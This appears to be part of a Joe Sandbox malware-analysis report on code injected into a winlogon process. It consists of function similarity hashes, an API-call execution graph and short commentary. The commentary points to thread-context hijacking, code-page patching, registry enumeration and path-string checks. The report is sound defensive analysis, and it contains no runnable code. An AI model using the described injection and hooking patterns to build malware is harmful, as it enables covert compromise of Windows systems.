                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CallTranslator
                                                                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                                                                • API String ID: 3163161869-2084237596
                                                                                                                                                                                                                                                • Opcode ID: 8ebe29515744ec85b4c7a5c69406529571aeda380531785c74bea0d93e5ddae6
                                                                                                                                                                                                                                                • Instruction ID: 09c55af3b9974b52cb78c98aa51ab59259fefcd4d6a26ee8bae7806f44521c8a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ebe29515744ec85b4c7a5c69406529571aeda380531785c74bea0d93e5ddae6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3761C073904BC885E7328F15E540BDAB7A0FB89B98F444215EBCC43B99DB79C190CB42
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileType
                                                                                                                                                                                                                                                • String ID: \\.\pipe\
                                                                                                                                                                                                                                                • API String ID: 3081899298-91387939
                                                                                                                                                                                                                                                • Opcode ID: ee842ef1b9af794ce5f9c57276e32575cf678b56a57e7c1674317c9bf9c17d00
                                                                                                                                                                                                                                                • Instruction ID: 792464171b4e510549dffe5492d106eee76e37af89db811b43d6c31c9ee4abde
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee842ef1b9af794ce5f9c57276e32575cf678b56a57e7c1674317c9bf9c17d00
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B1512633A8478881F6268F29A564BEA7791FF86749FC40159DE4903B8ACA3BC40487C3
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                • String ID: U
                                                                                                                                                                                                                                                • API String ID: 442123175-4171548499
• Opcode ID: 6a2d2f89dbe45a9fea545bcb4aa06eef1d3c7bdcbbdd9a8edf910a903994b9b4
• Instruction ID: 3f69a4f911fd7435bf626cb3594783c82f57a32be013ebfb7e8e93df65a6d977
• Opcode Fuzzy Hash: 6a2d2f89dbe45a9fea545bcb4aa06eef1d3c7bdcbbdd9a8edf910a903994b9b4
• Instruction Fuzzy Hash: 7641C573716B4482EB21DF25E4447D977A1FB88788F804021EE4D87798EB3DC401C782

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
Similarity
• API ID: ExceptionFileHeaderRaise
• String ID: csm
• API String ID: 2573137834-1018135373
• Opcode ID: d7810ab3a0ec9818877cf1b3e283a106e6e962497adc233d094785ed36f44b7e
• Instruction ID: afb6977eab6e0c94123a84478745c0422c43e9ef5b71f02b2ee91409bbc62b5d
• Opcode Fuzzy Hash: d7810ab3a0ec9818877cf1b3e283a106e6e962497adc233d094785ed36f44b7e
• Instruction Fuzzy Hash: 63112B33615B8482EB628B15F44069977E5FBC8B98F984224EB8D07B64EF3DC5518B41

APIs
Memory Dump Source
• Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID:
• API String ID: 756756679-0
• Opcode ID: 1e98e18f6346a7606d876eb22bc804523d63b476fed3d5047e07684f33477b56
• Instruction ID: dced5fbc4efeb8eb5392c409e9291e4daa8df8c6572b07f196e14503489c10e8
• Opcode Fuzzy Hash: 1e98e18f6346a7606d876eb22bc804523d63b476fed3d5047e07684f33477b56
• Instruction Fuzzy Hash: D511E776A02B4881FB05CF66A4046A977A1FFC9FC9F994064CE4D83765DF3AC482D382

APIs
Memory Dump Source
• Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
Similarity
• API ID: Heap$AllocProcess
• String ID:
• API String ID: 1617791916-0
• Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
• Instruction ID: da8c3dafd84f4e9d3148870d217228cf2e181fae1a96b4a2815fc4d2442c645c
• Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
• Instruction Fuzzy Hash: 8FE039B6A4270886FB058B62D80878A36E1FB89B0AF848024C90907351DF7EC899C792

Execution Graph

Execution Coverage: 1.2%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 1553
Total number of Limit Nodes: 8

[Rendered execution graph not recoverable in text; what survived extraction is its node/edge dump, in which each node is a numeric id, a function address in the 265b3c0xxxx range and any symbol or API labels, and each edge is id->id. The raw dump is not reproduced here.]
Win32/NTDLL exports labelled on graph nodes: CloseHandle, EnterCriticalSection, FindFirstFileExW, FlsGetValue, FlsSetValue, FlushInstructionCache, FreeLibrary, FreeLibraryAndExitThread, GetCurrentProcess, GetCurrentThread, GetCurrentThreadId, GetLastError, GetModuleFileNameW, GetModuleHandleW, GetProcessHeap, GetThreadContext, HeapFree, IsDebuggerPresent, IsProcessorFeaturePresent, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, RaiseException, ResumeThread, RtlCaptureContext, RtlPcToFileHeader, SetThreadContext, SetUnhandledExceptionFilter, StrCmpNIW, TerminateThread, TlsSetValue, UnhandledExceptionFilter, VirtualFree, VirtualProtect, VirtualProtectEx. Most other labels are MSVC CRT internals (_CallSETranslator, __CxxCallCatchBlock, __free_lconv_num, _invalid_parameter_noinfo, std::bad_alloc, Concurrency::cancel_current_task and similar), so the bulk of the graphed code is statically linked runtime rather than the payload's own logic.
Paths worth reading in the dump: 265b3c036dc calls GetModuleHandleW, then GetCurrentProcess and VirtualProtectEx twice, then TerminateThread, with FreeLibraryAndExitThread as the exit; 265b3c05b40 calls GetCurrentThreadId, then GetThreadContext, SetThreadContext, VirtualProtect with FlushInstructionCache, and ResumeThread, a sequence consistent with patching code pages and redirecting a thread (inline hook installation or thread hijacking); 265b3c0d814 calls RtlCaptureContext, then IsDebuggerPresent, SetUnhandledExceptionFilter and UnhandledExceptionFilter, which is the shape of the CRT's __report_gsfailure / __raise_securityfailure handler and not, on its own, an anti-debugging check.
__free_lconv_num 7 API calls 9401->9404 9402 265b3c0ef0d 9408 265b3c0ebd8 9402->9408 9403->9402 9405 265b3c0d46c 12 API calls 9403->9405 9404->9399 9406 265b3c0f23c 9405->9406 9407 265b3c0eed8 38 API calls 9406->9407 9407->9402 9447 265b3c0e724 9408->9447 9411 265b3c0ebf8 GetOEMCP 9413 265b3c0ec1f 9411->9413 9412 265b3c0ec0a 9412->9413 9414 265b3c0ec0f GetACP 9412->9414 9413->9392 9415 265b3c0cf7c 9413->9415 9414->9413 9416 265b3c0cfc7 9415->9416 9419 265b3c0cf8b _invalid_parameter_noinfo 9415->9419 9417 265b3c0dc1c __std_exception_copy 7 API calls 9416->9417 9418 265b3c0cfc5 9417->9418 9418->9380 9418->9382 9419->9416 9419->9418 9420 265b3c0bdcc _invalid_parameter_noinfo 2 API calls 9419->9420 9420->9419 9422 265b3c0ebd8 19 API calls 9421->9422 9423 265b3c0f2a9 9422->9423 9424 265b3c0f3ff 9423->9424 9426 265b3c0f2e6 IsValidCodePage 9423->9426 9430 265b3c0f300 9423->9430 9425 265b3c07950 _log10_special 2 API calls 9424->9425 9427 265b3c0f045 9425->9427 9426->9424 9428 265b3c0f2f7 9426->9428 9427->9385 9427->9390 9429 265b3c0f326 GetCPInfo 9428->9429 9428->9430 9429->9424 9429->9430 9463 265b3c0ecf0 9430->9463 9433 265b3c0cf0c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 9432->9433 9434 265b3c0ea24 9433->9434 9435 265b3c0dc1c __std_exception_copy 7 API calls 9434->9435 9438 265b3c0ea51 9434->9438 9436 265b3c0eac0 9435->9436 9437 265b3c0dae0 _invalid_parameter_noinfo 20 API calls 9436->9437 9437->9438 9439 265b3c0dc1c __std_exception_copy 7 API calls 9438->9439 9443 265b3c0eb03 9438->9443 9440 265b3c0eb61 9439->9440 9441 265b3c0dae0 _invalid_parameter_noinfo 20 API calls 9440->9441 9441->9443 9442 265b3c0eb9d 9444 265b3c0cf60 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 9442->9444 9443->9442 9446 265b3c0dcb4 __free_lconv_num 7 API calls 9443->9446 9445 265b3c0ebcb 9444->9445 9445->9395 9446->9442 9448 265b3c0e748 9447->9448 9454 265b3c0e743 9447->9454 9449 265b3c0d398 _invalid_parameter_noinfo 17 API calls 9448->9449 
9448->9454 9450 265b3c0e763 9449->9450 9455 265b3c1096c 9450->9455 9454->9411 9454->9412 9456 265b3c0e786 9455->9456 9457 265b3c10981 9455->9457 9459 265b3c109d8 9456->9459 9457->9456 9458 265b3c10fcc _invalid_parameter_noinfo 17 API calls 9457->9458 9458->9456 9460 265b3c109ed 9459->9460 9462 265b3c10a00 9459->9462 9461 265b3c0f260 _invalid_parameter_noinfo 17 API calls 9460->9461 9460->9462 9461->9462 9462->9454 9464 265b3c0ed2d GetCPInfo 9463->9464 9473 265b3c0ee23 9463->9473 9467 265b3c0ed40 9464->9467 9464->9473 9465 265b3c07950 _log10_special 2 API calls 9466 265b3c0eec2 9465->9466 9466->9424 9474 265b3c11ab4 9467->9474 9473->9465 9475 265b3c0e724 17 API calls 9474->9475 9476 265b3c11af6 9475->9476 9494 265b3c0f5ec 9476->9494 9496 265b3c0f5f5 MultiByteToWideChar 9494->9496 9533 265b3c0d510 __std_exception_copy 7 API calls 9532->9533 9534 265b3c0db9d __free_lconv_num 9533->9534 9535 265b3c0d510 __std_exception_copy 7 API calls 9534->9535 9536 265b3c0dbbf 9535->9536 9536->9340 9538 265b3c0f904 3 API calls 9537->9538 9539 265b3c0fb38 9538->9539 9539->9343 9541 265b3c0e807 9540->9541 9542 265b3c0e7ec 9540->9542 9543 265b3c0e80c 9541->9543 9544 265b3c0e86a __vcrt_InitializeCriticalSectionEx 9541->9544 9542->9340 9543->9542 9545 265b3c0dc1c __std_exception_copy 7 API calls 9543->9545 9544->9542 9546 265b3c0db90 7 API calls 9544->9546 9545->9542 9547 265b3c0e877 9546->9547 9548 265b3c0dc1c __std_exception_copy 7 API calls 9547->9548 9548->9542 9550 265b3c0f53c 9549->9550 9551 265b3c0e724 17 API calls 9550->9551 9552 265b3c0f560 9551->9552 9552->9346 9553 265b3c0caa4 9556 265b3c0c854 9553->9556 9563 265b3c0c81c 9556->9563 9564 265b3c0c82c 9563->9564 9565 265b3c0c831 9563->9565 9566 265b3c0c7d8 7 API calls 9564->9566 9567 265b3c0c838 9565->9567 9566->9565 9568 265b3c0c848 9567->9568 9569 265b3c0c84d 9567->9569 9570 265b3c0c7d8 7 API calls 9568->9570 9571 265b3c0c7d8 9569->9571 9570->9569 9575 265b3c0c7dd 9571->9575 9576 265b3c0c80e 9571->9576 9572 265b3c0c806 9574 
265b3c0dcb4 __free_lconv_num 7 API calls 9572->9574 9573 265b3c0dcb4 __free_lconv_num 7 API calls 9573->9575 9574->9576 9575->9572 9575->9573 8606 265b3c029a4 8608 265b3c029f8 8606->8608 8607 265b3c02a13 8608->8607 8610 265b3c03144 8608->8610 8611 265b3c031da 8610->8611 8613 265b3c03169 8610->8613 8611->8607 8612 265b3c03858 StrCmpNIW 8612->8613 8613->8611 8613->8612 8614 265b3c01ce8 StrCmpIW StrCmpW 8613->8614 8614->8613 9577 265b3c014a4 9578 265b3c014e6 GetProcessHeap HeapFree GetProcessHeap HeapFree 9577->9578 9579 265b3c014c6 GetProcessHeap HeapFree 9577->9579 9580 265b3c16180 9578->9580 9579->9578 9579->9579 9873 265b3c02a28 9875 265b3c02a85 9873->9875 9874 265b3c02aa0 9875->9874 9876 265b3c031f8 3 API calls 9875->9876 9876->9874 9075 265b3c07b2c 9077 265b3c07b50 __scrt_release_startup_lock 9075->9077 9076 265b3c0be55 9077->9076 9078 265b3c0d510 __std_exception_copy 7 API calls 9077->9078 9079 265b3c0be7e _invalid_parameter_noinfo 9078->9079 8615 265b3c101b0 8617 265b3c10207 8615->8617 8619 265b3c101e0 8615->8619 8616 265b3c0d510 __std_exception_copy 7 API calls 8622 265b3c101f4 8616->8622 8618 265b3c102dc 8617->8618 8621 265b3c0cf0c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 8617->8621 8623 265b3c10410 8618->8623 8625 265b3c10343 8618->8625 8631 265b3c1030a 8618->8631 8619->8616 8619->8617 8619->8622 8620 265b3c10244 8621->8618 8622->8617 8622->8620 8624 265b3c10289 8622->8624 8626 265b3c1041d 8623->8626 8627 265b3c0cf60 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 8623->8627 8628 265b3c0dc1c __std_exception_copy 7 API calls 8624->8628 8629 265b3c0cf60 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 8625->8629 8636 265b3c103a1 8625->8636 8627->8626 8630 265b3c1028e 8628->8630 8629->8636 8638 265b3c0dae0 8630->8638 8631->8625 8632 265b3c0d398 _invalid_parameter_noinfo 17 API calls 8631->8632 8634 265b3c10333 8632->8634 8635 265b3c0d398 _invalid_parameter_noinfo 17 API calls 8634->8635 
8635->8625 8637 265b3c0d398 17 API calls _invalid_parameter_noinfo 8636->8637 8637->8636 8641 265b3c0d978 8638->8641 8642 265b3c0d9a3 8641->8642 8649 265b3c0da14 8642->8649 8644 265b3c0d9ca 8645 265b3c0d9ed 8644->8645 8655 265b3c0cd10 8644->8655 8646 265b3c0da02 8645->8646 8648 265b3c0cd10 _invalid_parameter_noinfo 20 API calls 8645->8648 8646->8620 8648->8646 8666 265b3c0d75c 8649->8666 8651 265b3c0da4f _invalid_parameter_noinfo 8651->8644 8652 265b3c0da3e _invalid_parameter_noinfo 8652->8651 8653 265b3c0d978 _invalid_parameter_noinfo 20 API calls 8652->8653 8654 265b3c0daf9 8653->8654 8654->8644 8656 265b3c0cd68 8655->8656 8657 265b3c0cd1f __vcrt_InitializeCriticalSectionEx 8655->8657 8656->8645 8658 265b3c0d5d8 _invalid_parameter_noinfo 10 API calls 8657->8658 8659 265b3c0cd4e _CallSETranslator 8658->8659 8659->8656 8660 265b3c0cd10 _invalid_parameter_noinfo 20 API calls 8659->8660 8661 265b3c0cd97 8660->8661 8684 265b3c109a0 8661->8684 8667 265b3c0d778 __vcrt_InitializeCriticalSectionEx 8666->8667 8669 265b3c0d7a3 _CallSETranslator 8666->8669 8670 265b3c0d5d8 8667->8670 8669->8652 8671 265b3c0d5f7 FlsGetValue 8670->8671 8673 265b3c0d60c 8670->8673 8672 265b3c0d604 8671->8672 8671->8673 8672->8669 8673->8672 8674 265b3c0dc3c _invalid_parameter_noinfo 7 API calls 8673->8674 8675 265b3c0d62e 8674->8675 8676 265b3c0d64c FlsSetValue 8675->8676 8677 265b3c0d63c 8675->8677 8678 265b3c0d658 FlsSetValue 8676->8678 8679 265b3c0d66a 8676->8679 8682 265b3c0dcb4 __free_lconv_num 7 API calls 8677->8682 8678->8677 8680 265b3c0d104 _invalid_parameter_noinfo 7 API calls 8679->8680 8681 265b3c0d672 8680->8681 8683 265b3c0dcb4 __free_lconv_num 7 API calls 8681->8683 8682->8672 8683->8672 8685 265b3c109b9 8684->8685 8686 265b3c0cdbf 8684->8686 8685->8686 8692 265b3c10fcc 8685->8692 8688 265b3c10a0c 8686->8688 8689 265b3c10a25 8688->8689 8690 265b3c0cdcf 8688->8690 8689->8690 8705 265b3c0f260 8689->8705 8690->8645 8693 265b3c0d398 _invalid_parameter_noinfo 17 API calls 8692->8693 
8694 265b3c10fdb 8693->8694 8695 265b3c0cf0c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 8694->8695 8700 265b3c11021 8694->8700 8696 265b3c11004 8695->8696 8701 265b3c1103c 8696->8701 8699 265b3c0cf60 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 8699->8700 8700->8686 8702 265b3c1104e Concurrency::details::SchedulerProxy::DeleteThis 8701->8702 8704 265b3c11014 8701->8704 8703 265b3c10d24 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8702->8703 8702->8704 8703->8704 8704->8699 8706 265b3c0d398 _invalid_parameter_noinfo 17 API calls 8705->8706 8707 265b3c0f269 8706->8707 8708 265b3c115b0 8709 265b3c115cf 8708->8709 8710 265b3c11648 8709->8710 8713 265b3c115df 8709->8713 8716 265b3c081fc 8710->8716 8714 265b3c07950 _log10_special 2 API calls 8713->8714 8715 265b3c1163e 8714->8715 8719 265b3c08210 IsProcessorFeaturePresent 8716->8719 8718 265b3c0820a 8720 265b3c08227 8719->8720 8723 265b3c082ac RtlCaptureContext 8720->8723 8722 265b3c0823b 8722->8718 8724 265b3c082d7 capture_previous_context 8723->8724 8724->8722 9581 265b3c110b0 9582 265b3c110dd 9581->9582 9583 265b3c0dc1c __std_exception_copy 7 API calls 9582->9583 9588 265b3c110f2 _invalid_parameter_noinfo 9582->9588 9584 265b3c110e7 9583->9584 9585 265b3c0dae0 _invalid_parameter_noinfo 20 API calls 9584->9585 9585->9588 9586 265b3c07950 _log10_special 2 API calls 9587 265b3c114b0 9586->9587 9588->9586 8725 265b3c0b5b0 8728 265b3c089a0 8725->8728 8727 265b3c0b5d9 8729 265b3c089c1 8728->8729 8730 265b3c089f6 __std_exception_copy 8728->8730 8729->8730 8732 265b3c0cc58 8729->8732 8730->8727 8733 265b3c0cc65 8732->8733 8734 265b3c0cc6f 8732->8734 8733->8734 8739 265b3c0cc8a 8733->8739 8735 265b3c0dc1c __std_exception_copy 7 API calls 8734->8735 8736 265b3c0cc76 8735->8736 8737 265b3c0dae0 _invalid_parameter_noinfo 20 API calls 8736->8737 8738 265b3c0cc82 8737->8738 8738->8730 8739->8738 8740 265b3c0dc1c __std_exception_copy 7 API calls 8739->8740 
8740->8736 9877 265b3c12031 9878 265b3c0dc1c __std_exception_copy 7 API calls 9877->9878 9879 265b3c12036 9878->9879 9880 265b3c0dae0 _invalid_parameter_noinfo 20 API calls 9879->9880 9881 265b3c12041 9880->9881 9589 265b3c05cb3 9590 265b3c05cc0 9589->9590 9591 265b3c05ccc GetThreadContext 9590->9591 9592 265b3c05e2a 9590->9592 9591->9592 9593 265b3c05cf2 9591->9593 9595 265b3c05f0e 9592->9595 9596 265b3c05e51 VirtualProtect FlushInstructionCache 9592->9596 9593->9592 9594 265b3c05d19 9593->9594 9600 265b3c05d9d 9594->9600 9601 265b3c05d76 SetThreadContext 9594->9601 9597 265b3c05f2e 9595->9597 9599 265b3c043f0 VirtualFree 9595->9599 9596->9592 9598 265b3c04e00 3 API calls 9597->9598 9604 265b3c05f33 9598->9604 9599->9597 9601->9600 9602 265b3c05f87 9605 265b3c07950 _log10_special 2 API calls 9602->9605 9603 265b3c05f47 ResumeThread 9603->9604 9604->9602 9604->9603 9606 265b3c05fcf 9605->9606 8191 265b3c02034 8193 265b3c02065 8191->8193 8192 265b3c02146 8193->8192 8194 265b3c0217b 8193->8194 8200 265b3c02089 8193->8200 8195 265b3c021ef 8194->8195 8196 265b3c02180 8194->8196 8195->8192 8199 265b3c02f18 9 API calls 8195->8199 8209 265b3c02f18 GetProcessHeap 8196->8209 8198 265b3c020c1 StrCmpNIW 8198->8200 8199->8192 8200->8192 8200->8198 8202 265b3c01bfc 8200->8202 8203 265b3c01c97 8202->8203 8204 265b3c01c23 GetProcessHeap 8202->8204 8203->8200 8205 265b3c01c49 _invalid_parameter_noinfo 8204->8205 8205->8203 8206 265b3c01c7f GetProcessHeap HeapFree 8205->8206 8207 265b3c01534 2 API calls 8205->8207 8206->8203 8208 265b3c01c76 8207->8208 8208->8206 8211 265b3c02f54 _invalid_parameter_noinfo 8209->8211 8210 265b3c03029 GetProcessHeap HeapFree 8210->8192 8211->8210 8212 265b3c03024 8211->8212 8213 265b3c02fb6 StrCmpNIW 8211->8213 8214 265b3c01bfc 5 API calls 8211->8214 8212->8210 8213->8211 8214->8211 9882 265b3c15c35 9883 265b3c08c04 _CallSETranslator 4 API calls 9882->9883 9884 265b3c15c4d 9883->9884 9885 265b3c08c04 _CallSETranslator 4 API calls 9884->9885 9886 
265b3c15c68 9885->9886 9887 265b3c08c04 _CallSETranslator 4 API calls 9886->9887 9888 265b3c15c7c 9887->9888 9889 265b3c08c04 _CallSETranslator 4 API calls 9888->9889 9890 265b3c15cbe 9889->9890 9080 265b3c02338 9082 265b3c023b6 9080->9082 9081 265b3c024d3 9082->9081 9083 265b3c0241b GetFileType 9082->9083 9084 265b3c02429 StrCpyW 9083->9084 9085 265b3c0243d 9083->9085 9089 265b3c0244a 9084->9089 9086 265b3c01a48 4 API calls 9085->9086 9086->9089 9087 265b3c03858 StrCmpNIW 9087->9089 9088 265b3c03058 4 API calls 9088->9089 9089->9081 9089->9087 9089->9088 9090 265b3c01cb4 2 API calls 9089->9090 9090->9089 9091 265b3c0cb3c 9092 265b3c0dcb4 __free_lconv_num 7 API calls 9091->9092 9093 265b3c0cb4c 9092->9093 9094 265b3c0dcb4 __free_lconv_num 7 API calls 9093->9094 9095 265b3c0cb60 9094->9095 9096 265b3c0dcb4 __free_lconv_num 7 API calls 9095->9096 9097 265b3c0cb74 9096->9097 9098 265b3c0dcb4 __free_lconv_num 7 API calls 9097->9098 9099 265b3c0cb88 9098->9099 9891 265b3c0783c 9892 265b3c07858 9891->9892 9893 265b3c0785d 9891->9893 9895 265b3c07970 9892->9895 9896 265b3c07a07 9895->9896 9897 265b3c07993 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 9895->9897 9896->9893 9897->9896 8744 265b3c0ffc0 8745 265b3c0cf0c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 8744->8745 8746 265b3c0ffd0 8745->8746 8755 265b3c1227c 8746->8755 8750 265b3c0cf60 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 8752 265b3c0fff3 8750->8752 8754 265b3c0ffe7 8754->8750 8756 265b3c1229b 8755->8756 8757 265b3c122c4 8755->8757 8759 265b3c0dc1c __std_exception_copy 7 API calls 8756->8759 8758 265b3c0cf0c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 8757->8758 8765 265b3c122ce 8758->8765 8760 265b3c122a0 8759->8760 8761 265b3c0dae0 _invalid_parameter_noinfo 20 API calls 8760->8761 8763 265b3c0ffd9 8761->8763 8762 265b3c0cf60 Concurrency::details::SchedulerProxy::DeleteThis 
LeaveCriticalSection 8762->8763 8763->8754 8767 265b3c0fdc8 GetStartupInfoW 8763->8767 8766 265b3c122fd 8765->8766 8778 265b3c12184 8765->8778 8766->8762 8768 265b3c0fe97 8767->8768 8769 265b3c0fdfd 8767->8769 8773 265b3c0feb8 8768->8773 8769->8768 8770 265b3c1227c 24 API calls 8769->8770 8771 265b3c0fe26 8770->8771 8771->8768 8772 265b3c0fe50 GetFileType 8771->8772 8772->8771 8777 265b3c0fed6 8773->8777 8774 265b3c0ff31 GetStdHandle 8776 265b3c0ff44 GetFileType 8774->8776 8774->8777 8775 265b3c0ffa5 8775->8754 8776->8777 8777->8774 8777->8775 8779 265b3c0dc3c _invalid_parameter_noinfo 7 API calls 8778->8779 8784 265b3c121a5 8779->8784 8780 265b3c12207 8781 265b3c0dcb4 __free_lconv_num 7 API calls 8780->8781 8782 265b3c12211 8781->8782 8782->8765 8784->8780 8785 265b3c0fb7c 8784->8785 8790 265b3c0f904 8785->8790 8787 265b3c0fbb2 8788 265b3c0fbd1 InitializeCriticalSectionAndSpinCount 8787->8788 8789 265b3c0fbb7 _invalid_parameter_noinfo 8787->8789 8788->8789 8789->8784 8792 265b3c0f961 __vcrt_InitializeCriticalSectionEx 8790->8792 8795 265b3c0f95c __vcrt_InitializeCriticalSectionEx 8790->8795 8791 265b3c0f991 LoadLibraryExW 8793 265b3c0fa66 8791->8793 8791->8795 8792->8787 8793->8792 8794 265b3c0fa7d FreeLibrary 8793->8794 8794->8792 8795->8791 8795->8792 8796 265b3c0f9f0 LoadLibraryExW 8795->8796 8796->8793 8796->8795 9100 265b3c02b40 9102 265b3c02bb1 9100->9102 9101 265b3c02ef4 9102->9101 9103 265b3c02bdd GetModuleHandleA 9102->9103 9104 265b3c02bef __vcrt_InitializeCriticalSectionEx 9103->9104 9104->9101 9105 265b3c02c28 StrCmpNIW 9104->9105 9105->9101 9109 265b3c02c4d 9105->9109 9106 265b3c019a4 6 API calls 9106->9109 9107 265b3c02e19 lstrlenW 9107->9109 9108 265b3c02d5f lstrlenW 9108->9109 9109->9101 9109->9106 9109->9107 9109->9108 9110 265b3c03858 StrCmpNIW 9109->9110 9111 265b3c01534 StrCmpIW StrCmpW 9109->9111 9110->9109 9111->9109 8797 265b3c0f5c4 GetCommandLineA GetCommandLineW 9616 265b3c0cec4 9617 265b3c0cecc 9616->9617 9618 265b3c0fb7c 4 API calls 
9617->9618 9619 265b3c0cefd 9617->9619 9620 265b3c0cef9 9617->9620 9618->9617 9622 265b3c0cf28 9619->9622 9623 265b3c0cf53 9622->9623 9624 265b3c0cf36 DeleteCriticalSection 9623->9624 9625 265b3c0cf57 9623->9625 9624->9623 9625->9620 8081 265b3c02544 8082 265b3c025c3 8081->8082 8083 265b3c02625 GetFileType 8082->8083 8096 265b3c026f4 8082->8096 8084 265b3c02649 8083->8084 8085 265b3c02633 StrCpyW 8083->8085 8097 265b3c01a48 GetFinalPathNameByHandleW 8084->8097 8086 265b3c02658 8085->8086 8089 265b3c02662 8086->8089 8091 265b3c026f9 8086->8091 8088 265b3c03858 StrCmpNIW 8088->8091 8089->8096 8102 265b3c03858 8089->8102 8105 265b3c03058 StrCmpIW 8089->8105 8109 265b3c01cb4 8089->8109 8091->8088 8092 265b3c03058 4 API calls 8091->8092 8093 265b3c01cb4 2 API calls 8091->8093 8091->8096 8092->8091 8093->8091 8098 265b3c01ab1 8097->8098 8099 265b3c01a72 StrCmpNIW 8097->8099 8098->8086 8099->8098 8100 265b3c01a8c lstrlenW 8099->8100 8100->8098 8101 265b3c01a9e StrCpyW 8100->8101 8101->8098 8103 265b3c03865 StrCmpNIW 8102->8103 8104 265b3c0387a 8102->8104 8103->8104 8104->8089 8106 265b3c0308a StrCpyW StrCatW 8105->8106 8107 265b3c030a1 PathCombineW 8105->8107 8108 265b3c030aa 8106->8108 8107->8108 8108->8089 8110 265b3c01ccb 8109->8110 8111 265b3c01cd4 8109->8111 8113 265b3c01534 8110->8113 8111->8089 8114 265b3c01584 8113->8114 8117 265b3c0154e 8113->8117 8114->8111 8115 265b3c01565 StrCmpIW 8115->8117 8116 265b3c0156d StrCmpW 8116->8117 8117->8114 8117->8115 8117->8116 8118 265b3c01ac4 8123 265b3c01630 GetProcessHeap 8118->8123 8120 265b3c01ada Sleep SleepEx 8121 265b3c01ad3 8120->8121 8121->8120 8122 265b3c015a0 StrCmpIW StrCmpW 8121->8122 8122->8121 8124 265b3c01650 _invalid_parameter_noinfo 8123->8124 8168 265b3c01268 GetProcessHeap 8124->8168 8126 265b3c01658 8127 265b3c01268 2 API calls 8126->8127 8128 265b3c01669 8127->8128 8129 265b3c01268 2 API calls 8128->8129 8130 265b3c01672 8129->8130 8131 265b3c01268 2 API calls 8130->8131 8132 265b3c0167b 8131->8132 8133 
265b3c01696 RegOpenKeyExW 8132->8133 8134 265b3c016c8 RegOpenKeyExW 8133->8134 8135 265b3c018ae 8133->8135 8136 265b3c01707 RegOpenKeyExW 8134->8136 8137 265b3c016f1 8134->8137 8135->8121 8139 265b3c0172b 8136->8139 8140 265b3c01742 RegOpenKeyExW 8136->8140 8172 265b3c012bc RegQueryInfoKeyW 8137->8172 8183 265b3c0104c RegQueryInfoKeyW 8139->8183 8141 265b3c01766 8140->8141 8142 265b3c0177d RegOpenKeyExW 8140->8142 8145 265b3c012bc 13 API calls 8141->8145 8146 265b3c017b8 RegOpenKeyExW 8142->8146 8147 265b3c017a1 8142->8147 8149 265b3c01773 RegCloseKey 8145->8149 8151 265b3c017dc 8146->8151 8152 265b3c017f3 RegOpenKeyExW 8146->8152 8150 265b3c012bc 13 API calls 8147->8150 8149->8142 8153 265b3c017ae RegCloseKey 8150->8153 8154 265b3c012bc 13 API calls 8151->8154 8155 265b3c01817 8152->8155 8156 265b3c0182e RegOpenKeyExW 8152->8156 8153->8146 8159 265b3c017e9 RegCloseKey 8154->8159 8160 265b3c0104c 5 API calls 8155->8160 8157 265b3c01869 RegOpenKeyExW 8156->8157 8158 265b3c01852 8156->8158 8162 265b3c0188d 8157->8162 8163 265b3c018a4 RegCloseKey 